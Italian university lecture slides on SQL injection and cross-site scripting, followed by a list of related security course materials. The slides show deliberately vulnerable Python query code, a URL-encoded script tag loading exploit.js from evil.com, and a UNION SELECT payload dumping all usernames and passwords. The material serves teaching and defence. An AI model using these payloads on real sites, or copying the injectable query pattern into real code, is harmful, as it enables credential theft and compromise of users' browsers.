Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting"

Transcript

1 Pattern Recognition and Applications Lab Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting Dott. Ing. Igino Corona igino.corona (at) diee.unica.it Corso Sicurezza Informatica 2014/2015 Department of Electrical and Electronic Engineering University of Cagliari, Italy

2 About me Assegnista di Ricerca - DIEE, UniCA Principali interessi di ricerca: Rilevazione di attacchi informatici Reti Fast Flux Servizi Web Malware - PDF, Android, JavaScript Pagine web di Phishing Siti di vendita illegale di farmaci Tecniche di apprendimento automatico Robuste ad attacchi da parte di un avversario intelligente Evasione, inquinamento dati di addestramento Applicate a prototipi e problemi reali https://pralab.diee.unica.it/iginocorona 2

3 Alcuni progetti e sistemi sviluppati Febbraio Febbraio 2016 Budget ( ): 364,000 Novembre Maggio 2015 Budget ( ): 219,100 Gennaio Dicembre 2015 Budget ( ): 1,289,764 FluxBuster FightPhishing SuStorID Lux0R Malware 3

4 Servizio Web Qualsiasi servizio che utilizzi il protocollo HTTP(S) per lo scambio di dati GET /watch?v=usbjl-wo9xm HTTP(S) protocol Web Browser Internet Explorer Web Server 4

5 Servizio Web - meccanismo base La richiesta HTTP(S) viene interpretata lato server per identificare un applicazione web (programma) e i suoi input GET /watch?v=usbjl-wo9xm Web Browser Internet Explorer attributo = valore Web Server input seleziona applicazione web programma HTML, testo, immagini, video, output N.B. Gli input non si limitano alla request line! 5

6 Servizio Web - Input Validation Attack Cosa succede se gli input non sono fra quelli previsti in fase di sviluppo dell applicazione web? GET /watch?v=<evil input> HTTP(S) protocol Web Client Attacker Script Web Server output? 6

7 Validazione degli input In questa lezione vedremo due tipologie di attacco molto diffuse che sfruttano vulnerabilità relative alla validazione dell input delle applicazioni web SQL Injection Cross-site Scripting Corrispondono alle minacce OWASP di livello A1 e A3 (2013) https://www.owasp.org/images/c/c9/owasp_top_10_-_2013_- _Italiano.pdf 7

8 Database e Web apps - Youtube Database video hash tags content users user password usbjl-wo9xm 39vhEHUOBRU slash; world on fire; deep purple; made in japan; [binary] [binary] jhonny mary supersecure214 beatles203 Web Applications (Python) def results(search_query): query = "SELECT DISTINCT hash FROM video WHERE tags LIKE '%%%s%%' " % search_query hashes = db_cursor.execute(query) return results_page(search_query, hashes) def getvideo(v): query = "SELECT content FROM video WHERE hash='%s'" % v return db_cursor.execute(query) 8

9 Servizio Web - Youtube La richiesta HTTP(S) viene interpretata lato server per identificare un applicazione web (programma) e i suoi input GET /results?search_query=deep+purple Web Browser Internet Explorer search_query = deep purple" Web Server input seleziona applicazione web results() Deep Purple video results output 9

10 Youtube 10

11 Cross-site Scripting input output https://www.youtube.com/watch?v=39vhehuobru 11

12 Cross-site Scripting Il servizio normalmente funziona bene, ma è affetto da una GRAVE vulnerabilità la variabile seach_query viene validata? def results(search_query): query = "SELECT DISTINCT hash FROM video WHERE tags LIKE '%%%s%%' " % search_query hashes = db_cursor.execute(query) return results_page(search_query, hashes) Obiettivo: infettare un computer vittima attraverso link relativo a Youtube Tecnica: può sfruttare una vulnerabilità XSS di Youtube per eseguire JavaScript malware sul computer vittima search_query = "%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F %65%76%69%6C%2E%63%6F%6D%2F%65%78%70%6C%6F%69%74%2E%6A%73%22%3E%3C%2F %73%63%72%69%70%74%3E" Se search_query viene riportato nell output della pagina così com è e viene interpretato dal browser come normale codice HTML <script src= ></script> 12

13 Youtube - Cross-site Scripting GET /results?search_query=<evil input> Hey check out this Youtube video! Victim User Internet Explorer Web Server v = "<evil input>" input seleziona applicazione web results() Tiny Youtube search page +malicious JavaScript code output <evil input>=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a %2F%2F%65%76%69%6C%2E%63%6F%6D%2F%65%78%70%6C%6F%69%74%2E%6A %73%22%3E%3C%2F%73%63%72%69%70%74%3E 13

14 SQL Injection In genere una web application si appoggia ad uno o piu database di backend per restituire i contenuti client web application database Ad esempio il nostro Youtube usa un database per memorizzare video, tags, e credenziali degli utenti. Se l input alla web app non viene correttamente validato Un attaccante può eseguire query piu o meno arbitrarie sul database per ottenere informazioni confidenziali, acquisire accesso non autorizzato ai sistemi, e/o compromettere l intera base di dati 14

15 Servizio Web - Tiny Youtube La richiesta HTTP(S) viene interpretata lato server per identificare un applicazione web (programma) e i suoi input GET /watch?v=usbjl-wo9xm Web Browser Internet Explorer v = "usbjl-wo9xm" Web Server input seleziona applicazione web getvideo() Deep Purple - Made in Japan video stream output 15

16 SQL Injection https://www.youtube.com/watch?v=39vhehuobru 16

17 GET Video Il servizio normalmente funziona bene, ma è affetto da una GRAVE vulnerabilità Web Application (Python) la variabile v viene validata? def getvideo(v): query = "SELECT content FROM video WHERE hash='%s'" % v return db_cursor.execute(query) Obiettivo: ottenere username e password di Youtube Tecnica: può usare SQL injection sfruttando la mancata validazione di input sulla variabile v v = "usbjl-wo9xm' UNION SELECT CONCAT(user,' ',password) FROM users WHERE '1'='1" query = "SELECT content FROM video WHERE hash='usbjl-wo9xm' UNION SELECT CONCAT(user,' ',pass) FROM users WHERE 1'='1'" Alla fine dello stream video troverà concatenati tutti i nomi utente e le password degli utenti del servizio! 17

18 SQL Injection GET /watch?v=<evil input> Web Client Attacker Script v = "<evil input>" Web Server input seleziona applicazione web getvideo() Slash - World On Fire video stream +concat(user,password) output <evil input>=usbjl-wo9xm'/**/union/**/select/**/ CONCAT(user,' ',pass)/**/from/**/users/**/where/**/'1'='1 18

19 Live Demo Per i nostri test useremo https://hack.me/101229/web-app-hack-tutorial.html 19

20 Prevenzione attacchi a servizi Web La natura delle applicazioni web è spesso eterogenea diverse architetture, linguaggi di programmazione, librerie, ambienti di sviluppo funzionalità molto variegate interazione con altri sistemi: es. database, sensori, servizi web di terze parti, etc. gestione di informazioni di vario tipo e confidenzialità diverse necessità in termini di disponibilità e qualità del servizio, anche in funzione del numero e tipologia di utenze difficile affrontare il problema in maniera generale esistono tuttavia delle metodiche di sviluppo sicuro del codice per prevenire le vulnerabilità piu comuni e pericolose importante riferimento è OWASP https://www.owasp.org/ images/0/08/owasp_scp_quick_reference_guide_v2.pdf 20

21 Prevenzione attacchi a servizi Web Le best practice di sviluppo previste dall ingegneria del software sono un punto di partenza La sicurezza è implementabile attraverso dei vincoli addizionali (funzionali e non) che devono prendere parte nel progetto stesso es. crittografia, meccanismi di verifica del funzionamento dell applicazione, profiling delle azioni compiute dagli utenti/ host client in genere è molto meno costoso che correggere il software in corso d opera o addirittura dopo il rilascio tradeoff con usabilità Alcune linee guida: validazione dell input: gestire tutte le situazioni in cui l input non è quello atteso. L input è di default NON FIDATO rispetto della logica applicativa: assicurarsi che non esistano (sequenze di) richieste, o condizioni relative ai sistemi con cui l applicazione interagisce, che possano portare l applicazione web in stati non previsti 21

22 Prevenzione attacchi a servizi Web Le best practice di sviluppo previste dall ingegneria del software sono un punto di partenza La sicurezza è implementabile attraverso dei vincoli addizionali (funzionali e non) che devono prendere parte nel progetto stesso es. crittografia, meccanismi di verifica del funzionamento dell applicazione, profiling delle azioni compiute dagli utenti/ host client in genere è molto meno costoso che correggere il software in corso d opera o addirittura dopo il rilascio tradeoff con usabilità Per implementare in maniera corretta vincoli legati alla sicurezza è bene utilizzare dei framework di sviluppo e delle librerie ben collaudati es. python Django, Java Spring, Ruby on Rails devono essere considerati solo come un supporto la sicurezza delle web app è comunque legata sempre e comunque ad un corretto utilizzo dei framework e librerie 22

23 Nella prossima lezione Come in tutte le problematiche di sicurezza, la prevenzione è solo una parte della soluzione Vedremo i principali meccanismi di rilevazione e risposta contro attacchi a servizi web Ad esempio, contro attacchi automatizzati di password guessing, information gathering, utilizzo del servizio in maniera anomala 23

Laboratorio di reti II: Problematiche di sicurezza delle reti

Laboratorio di reti II: Problematiche di sicurezza delle reti Laboratorio di reti II: Problematiche di sicurezza delle reti Stefano Brocchi brocchi@dsi.unifi.it 30 maggio, 2008 Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, 2008 1 / 43 La sicurezza

Dettagli

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Navigazione automatica e rilevazione di errori in applicazioni web

Navigazione automatica e rilevazione di errori in applicazioni web Politecnico di Milano Navigazione automatica e rilevazione di errori in applicazioni web Relatore: Prof. Stefano Zanero Fabio Quarti F e d e r i c o V i l l a A.A. 2006/2007 Sommario Obiettivo: Illustrare

Dettagli

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti Corso di Sicurezza Informatica Sicurezza del software Ing. Gianluca Caminiti SQL Injection Sommario Premessa sul funzionamento dei siti dinamici SQL Injection: Overview Scenari di attacco: Errata gestione

Dettagli

TeamPortal. Infrastruttura

TeamPortal. Infrastruttura TeamPortal Infrastruttura 05/2013 TeamPortal Infrastruttura Rubriche e Contatti Bacheca Procedure Gestionali Etc Framework TeamPortal Python SQL Wrapper Apache/SSL PostgreSQL Sistema Operativo TeamPortal

Dettagli

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER L architettura CLIENT SERVER è l architettura standard dei sistemi di rete, dove i computer detti SERVER forniscono servizi, e computer detti CLIENT, richiedono

Dettagli

Programmazione Java Avanzata

Programmazione Java Avanzata Programmazione Java Avanzata Accesso ai Dati Ing. Giuseppe D'Aquì Testi Consigliati Eclipse In Action Core J2EE Patterns - DAO [http://java.sun.com/blueprints/corej2eepatterns/patterns/dataaccessobject.html]

Dettagli

Indice register_globals escaping

Indice register_globals escaping 1 Indice La sicurezza delle applicazioni web Le vulnerabilità delle applicazioni web La sicurezza in PHP: La direttiva register_globals Filtrare l'input Filtrare l'output (escaping) SQL Injection Cross

Dettagli

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti L attività di un Ethical Hacker Esempi pratici, risultati e contromisure consigliate Massimo Biagiotti Information Technology > Chiunque operi nel settore sa che il panorama dell IT è in continua evoluzione

Dettagli

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità.

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Livello di Pericolosità 3: Login Cracking: Il cracking è il

Dettagli

Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1)

Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1) Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1) Chiara Braghin chiara.braghin@unimi.it Le 2 maggiori vulnerabilità dei siti Web SQL Injection Il browser spedisce dell input

Dettagli

Esercitazione 8. Basi di dati e web

Esercitazione 8. Basi di dati e web Esercitazione 8 Basi di dati e web Rev. 1 Basi di dati - prof. Silvio Salza - a.a. 2014-2015 E8-1 Basi di dati e web Una modalità tipica di accesso alle basi di dati è tramite interfacce web Esiste una

Dettagli

Attacchi alle Applicazioni Web

Attacchi alle Applicazioni Web Attacchi alle Applicazioni Web http://www.infosec.it info@infosec.it Relatore: Matteo Falsetti Webbit03 Attacchi alle Applicazioni Web- Pagina 1 Applicazioni web: definizioni, scenari, rischi ICT Security

Dettagli

TeamPortal. Servizi integrati con ambienti Gestionali

TeamPortal. Servizi integrati con ambienti Gestionali TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Accesso da remoto Accesso da remoto Esempio 1 Sul Firewall devono essere aperte le porte 80 : http (o quella assegnata in fase di installazione/configurazione

Dettagli

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Concetti base di sicurezza applicativa web Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Agenda Concetti base Esempio reale (SQL code injection) Come cambia lo scenario

Dettagli

Cookie (1) - Componenti

Cookie (1) - Componenti Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response

Dettagli

Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection

Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response

Dettagli

Simone Riccetti. Applicazioni web:security by design

Simone Riccetti. Applicazioni web:security by design Simone Riccetti Applicazioni web:security by design Perchè il problema continua a crescere? Connettività: Internet L incremento del numero e delle tipologie d vettori di attacco è proporzionale all incremento

Dettagli

Siti interattivi e dinamici. in poche pagine

Siti interattivi e dinamici. in poche pagine Siti interattivi e dinamici in poche pagine 1 Siti Web interattivi Pagine Web codificate esclusivamente per mezzo dell HTML non permettono alcun tipo di interazione con l utente, se non quella rappresentata

Dettagli

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer Tecnologie per il Web Il web: architettura e tecnologie principali Una analisi delle principali tecnologie per il web Tecnologie di base http, ssl, browser, server, firewall e proxy Tecnologie lato client

Dettagli

- Oggi si sente sempre più spesso parlare di malware e virus. - Cosa sono? - Perché difendersi? - Cosa è lo spam?

- Oggi si sente sempre più spesso parlare di malware e virus. - Cosa sono? - Perché difendersi? - Cosa è lo spam? Perché questo corso - Oggi si sente sempre più spesso parlare di malware e virus. - Cosa sono? - Perché difendersi? - Cosa è lo spam? Cosa spiegheremo - protocolli e le tecnologie internet - quali sono

Dettagli

catalogo corsi di formazione 2015/2016

catalogo corsi di formazione 2015/2016 L offerta formativa inserita in questo catalogo è stata suddivisa in quattro sezioni tematiche che raggruppano i corsi di formazione sulla base degli argomenti trattati. Organizzazione, progettazione e

Dettagli

Vulnerabilità informatiche (semplici)..

Vulnerabilità informatiche (semplici).. Vulnerabilità informatiche (semplici).. in infrastrutture complesse....il contenuto di questo speech è di pura fantasia, ogni riferimento a infrastrutture reali o fatti realmente accaduti è puramente casuale

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Milano Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603 Fax +39.02.63118946

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

PIANO DI LAVORO EFFETTIVAMENTE SVOLTO IN RELAZIONE ALLA PROGRAMMAZIONE DISCIPLINARE

PIANO DI LAVORO EFFETTIVAMENTE SVOLTO IN RELAZIONE ALLA PROGRAMMAZIONE DISCIPLINARE Istituto di Istruzione Secondaria Superiore ETTORE MAJORANA 24068 SERIATE (BG) Via Partigiani 1 -Tel. 035-297612 - Fax 035-301672 e-mail: majorana@ettoremajorana.gov.it - sito internet: www.ettoremajorana.gov.it

Dettagli

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET)

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Ipotesi di partenza: concetti di base del networking Le ipotesi di partenza indispensabili per poter parlare di tecniche di accesso

Dettagli

Corso di Informatica Modulo T3 B1 Programmazione web

Corso di Informatica Modulo T3 B1 Programmazione web Corso di Informatica Modulo T3 B1 Programmazione web 1 Prerequisiti Architettura client/server Elementi del linguaggio HTML web server SQL server Concetti generali sulle basi di dati 2 1 Introduzione Lo

Dettagli

Concetti base. Impianti Informatici. Web application

Concetti base. Impianti Informatici. Web application Concetti base Web application La diffusione del World Wide Web 2 Supporto ai ricercatori Organizzazione documentazione Condivisione informazioni Scambio di informazioni di qualsiasi natura Chat Forum Intranet

Dettagli

Security by design. Come la gestione di un progetto può minimizzare i rischi per il business. Alessio L.R. Pennasilico - apennasilico@clusit.

Security by design. Come la gestione di un progetto può minimizzare i rischi per il business. Alessio L.R. Pennasilico - apennasilico@clusit. Security by design Come la gestione di un progetto può minimizzare i rischi per il business Alessio L.R. Pennasilico - apennasilico@clusit.it 22 Febbraio 2013 - Milano Alessio L.R. Pennasilico Security

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Sicurezza delle applicazioni web: attacchi web Alessandro Reina Aristide Fattori

Dettagli

Corso di Web Programming

Corso di Web Programming Corso di Web Programming 11. PHP - Complementi Paolo Milazzo Dipartimento di Informatica, Università di Pisa http://www.di.unipi.it/ milazzo milazzo di.unipi.it Corso di Laurea in Informatica Applicata

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2010/2011 Sicurezza delle applicazioni web: attacchi web Alessandro Reina, Aristide Fattori 12 Maggio

Dettagli

Single Sign On sul web

Single Sign On sul web Single Sign On sul web Abstract Un Sigle Sign On (SSO) è un sistema di autenticazione centralizzata che consente a un utente di fornire le proprie credenziali una sola volta e di accedere a molteplici

Dettagli

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection ---------------------------------------------------------------------..... _/ / _ / / \ \/ / / / / \ / \ \ \ / /_/ \ /\ / \ \ \ / /_/ > Y \ \ \ >\_/ / > / \ / / \/ \/ \/ \/ / / \/ ---------------------------------------------------------------------

Dettagli

Protocolli e architetture per WIS

Protocolli e architetture per WIS Protocolli e architetture per WIS Web Information Systems (WIS) Un Web Information System (WIS) usa le tecnologie Web per permettere la fruizione di informazioni e servizi Le architetture moderne dei WIS

Dettagli

Architetture Software

Architetture Software Università degli Studi di Parma Facoltà di Scienze MM. FF. NN. Corso di Laurea in Informatica Ingegneria del Software Architetture Software Giulio Destri Ing. del Sw: Architettura - 1 Scopo del modulo

Dettagli

RenderCAD S.r.l. Formazione

RenderCAD S.r.l. Formazione Corso Descrizione La durata di questo corso è complessivamente di ore 150 di cui 85 ore di teoria, 35 ore di pratica e 30 ore di stage in azienda. Nel nostro territorio esiste una richiesta di tale figura,

Dettagli

Contenuti. Applicazioni di rete e protocolli applicativi

Contenuti. Applicazioni di rete e protocolli applicativi Contenuti Architettura di Internet Principi di interconnessione e trasmissione World Wide Web Posta elettronica Motori di ricerca Tecnologie delle reti di calcolatori Servizi Internet (come funzionano

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Versione 2 Milano 14 Luglio 2006 Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603

Dettagli

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report Sommario Introduzione...3 Lista delle Vulnerabilità...3 Descrizione delle vulnerabilità...3 XSS...3 Captcha...4 Login...5

Dettagli

PIANO DI TUTELA DELLE ACQUE DELLA SICILIA (di cui all'art. 121 del Decreto Legislativo 3 aprile 2006, n 152)

PIANO DI TUTELA DELLE ACQUE DELLA SICILIA (di cui all'art. 121 del Decreto Legislativo 3 aprile 2006, n 152) Commissario Delegato per l Emergenza Bonifiche e la Tutela delle Acque in Sicilia PIANO DI TUTELA DELLE ACQUE DELLA SICILIA (di cui all'art. 121 del Decreto Legislativo 3 aprile 2006, n 152) Sistema WEB-GIS

Dettagli

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro?

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? Che cos'e' SQL? Acronimo di 'Structured Query Language E' un linguaggio

Dettagli

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso

Dettagli

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza 1 HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso

Dettagli

VBScript. VBScript. Visual Basic Scripting Edition. Linguaggio di script per browser e server Microsoft Deriva da Visual Basic, ma è interpretato

VBScript. VBScript. Visual Basic Scripting Edition. Linguaggio di script per browser e server Microsoft Deriva da Visual Basic, ma è interpretato VBScript Visual Basic Scripting Edition 1 VBScript Linguaggio di script per browser e server Microsoft Deriva da Visual Basic, ma è interpretato 2 Pag. 1 Principali caratteristiche Fine istruzione singola

Dettagli

Il DBMS Oracle. Express Edition. Donatella Gubiani e Angelo Montanari

Il DBMS Oracle. Express Edition. Donatella Gubiani e Angelo Montanari Gubiani & Montanari Il DBMS Oracle 1 Il DBMS Oracle Express Edition Donatella Gubiani e Angelo Montanari Il DBMS Oracle Il DBMS Oracle Oracle 10g Express Edition Il DBMS Oracle (nelle sue versioni più

Dettagli

Informatica Documentale

Informatica Documentale Informatica Documentale Ivan Scagnetto (scagnett@dimi.uniud.it) Stanza 3, Nodo Sud Dipartimento di Matematica e Informatica Via delle Scienze, n. 206 33100 Udine Tel. 0432 558451 Ricevimento: giovedì,

Dettagli

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato La scelta migliore per chi vuole diventare un Penetration Tester PTSv2 in breve: Online, accesso flessibile e illimitato 900+ slide interattive e 3 ore di lezioni video Apprendimento interattivo e guidato

Dettagli

Sicurezza delle applicazioni web

Sicurezza delle applicazioni web Sicurezza delle applicazioni web (Programmazione sicura in ambiente web) Luca Carettoni l.carettoni@securenetwork.it 26 Novembre Linux Day 2005 2005 Secure Network S.r.l. Il peggiore dei mondi... Un server

Dettagli

tesi di laurea Anno Accademico 2004/2005 relatore Ing. Massimo Ficco candidato Pasquale Incarnato Matr. 534/938

tesi di laurea Anno Accademico 2004/2005 relatore Ing. Massimo Ficco candidato Pasquale Incarnato Matr. 534/938 tesi di laurea Anno Accademico 2004/2005 relatore Ing. Massimo Ficco candidato Pasquale Incarnato Matr. 534/938 Obbiettivi del progetto Progettazione ed implementazione di un applicazione, basata su un

Dettagli

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database Corso di Informatica Modulo T3 B3 Programmazione lato server 1 Prerequisiti Architettura client/server Conoscenze generali sui database 2 1 Introduzione Lo scopo di questa Unità è descrivere gli strumenti

Dettagli

Assignment (1) - Varie

Assignment (1) - Varie Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it!

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET

18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET 18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET Ipotesi di partenza: concetti di base del networking Le ipotesi di partenza indispensabili per poter parlare di tecniche di accesso ai database

Dettagli

Sicurezza Informatica: Tecniche di SQL INJECTION

Sicurezza Informatica: Tecniche di SQL INJECTION Sicurezza Informatica: Tecniche di SQL INJECTION Pietro Bongli Aprile 2004 N.B. L'informazione contenuta in queste pagine è divulgata per scopi puramente didattici e non per ni illegali. Structured Query

Dettagli

Il Protocollo HTTP e la programmazione di estensioni Web

Il Protocollo HTTP e la programmazione di estensioni Web Il Protocollo HTTP e la programmazione di estensioni Web 1 Il protocollo HTTP È il protocollo standard inizialmente ramite il quale i server Web rispondono alle richieste dei client (prevalentemente browser);

Dettagli

Attacchi Web. Davide Marrone

Attacchi Web. Davide Marrone <davide@security.dico.unimi.it> Davide Marrone davide@security.dico.unimi.it Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Dipartimento di Informatica e Comunicazione 22 gennaio 2007 Sommario Classificazione

Dettagli

Le mie immagini su WEB: l ABC per iniziare. 6 maggio 2008

Le mie immagini su WEB: l ABC per iniziare. 6 maggio 2008 Le mie immagini su WEB: l ABC per iniziare 6 maggio 2008 1 1) Le nostre immagini su internet; perchè? 2) il WEB...il pc di chi accede (il client)...il sito (server); 3) costruzione del sito (design, strumenti

Dettagli

Il sistema IBM DB2. Sistemi Informativi T. Versione elettronica: L01.1.IntroduzioneDB2.pdf

Il sistema IBM DB2. Sistemi Informativi T. Versione elettronica: L01.1.IntroduzioneDB2.pdf Il sistema IBM DB2 Sistemi Informativi T Versione elettronica: L01.1.IntroduzioneDB2.pdf IBM DB2 Il DBMS relazionale IBM DB2 è il prodotto di punta dell IBM per la gestione di basi di dati relazionali

Dettagli

La rete Internet. Percorso di Preparazione agli Studi di Ingegneria. Università degli Studi di Brescia. Docente: Massimiliano Giacomin

La rete Internet. Percorso di Preparazione agli Studi di Ingegneria. Università degli Studi di Brescia. Docente: Massimiliano Giacomin La rete Internet Percorso di Preparazione agli Studi di Ingegneria Università degli Studi di Brescia Docente: Massimiliano Giacomin Elementi di Informatica e Programmazione Università di Brescia 1 Che

Dettagli

Istituto Tecnico Industriale Statale Dionigi Scano Cagliari. Candidato: Medda Daniele Classe 5ª C Informatica Anno scolastico 2013/2014.

Istituto Tecnico Industriale Statale Dionigi Scano Cagliari. Candidato: Medda Daniele Classe 5ª C Informatica Anno scolastico 2013/2014. Istituto Tecnico Industriale Statale Dionigi Scano Cagliari Candidato: Medda Daniele Classe 5ª C Informatica Anno scolastico 2013/2014 relate Un esperimento di social networking open source 1 Introduzione

Dettagli

Security Scan e Penetration Testing

Security Scan e Penetration Testing Security Scan e Penetration Testing esperienze di una realtà specializzata http://www.infosec.it info@infosec.it Il Net Probing INFOSEC Relatore: Stefano Venturoli Infosecurity 2002 Security Scan e Penetration

Dettagli

Istituto Tecnico Commerciale Indirizzo AFM articolazione SIA PERCHE???

Istituto Tecnico Commerciale Indirizzo AFM articolazione SIA PERCHE??? Istituto Tecnico Commerciale Indirizzo AFM articolazione SIA PERCHE??? Opportunità di lavoro: ICT - Information and Communication Technology in Azienda Vendite Acquisti Produzione Logistica AFM SIA ICT

Dettagli

ANNO SCOLASTICO: 2014-2015 DISCIPLINA: INFORMATICA CLASSE: 5 SI INDIRIZZO: SISTEMI INFORMATIVI DOCENTI: TISO EMANUELE BARBARA SECCHI

ANNO SCOLASTICO: 2014-2015 DISCIPLINA: INFORMATICA CLASSE: 5 SI INDIRIZZO: SISTEMI INFORMATIVI DOCENTI: TISO EMANUELE BARBARA SECCHI ANNO SCOLASTICO: 2014-2015 DISCIPLINA: INFORMATICA CLASSE: 5 SI INDIRIZZO: SISTEMI INFORMATIVI DOCENTI: TISO EMANUELE BARBARA SECCHI 1 2 ELENCO MODULI ARGOMENTI PRINCIPALI STRUMENTI PERIODO Base di Dati

Dettagli

Introduzione all elaborazione di database nel Web

Introduzione all elaborazione di database nel Web Introduzione all elaborazione di database nel Web Prof.ssa M. Cesa 1 Concetti base del Web Il Web è formato da computer nella rete Internet connessi fra loro in una modalità particolare che consente un

Dettagli

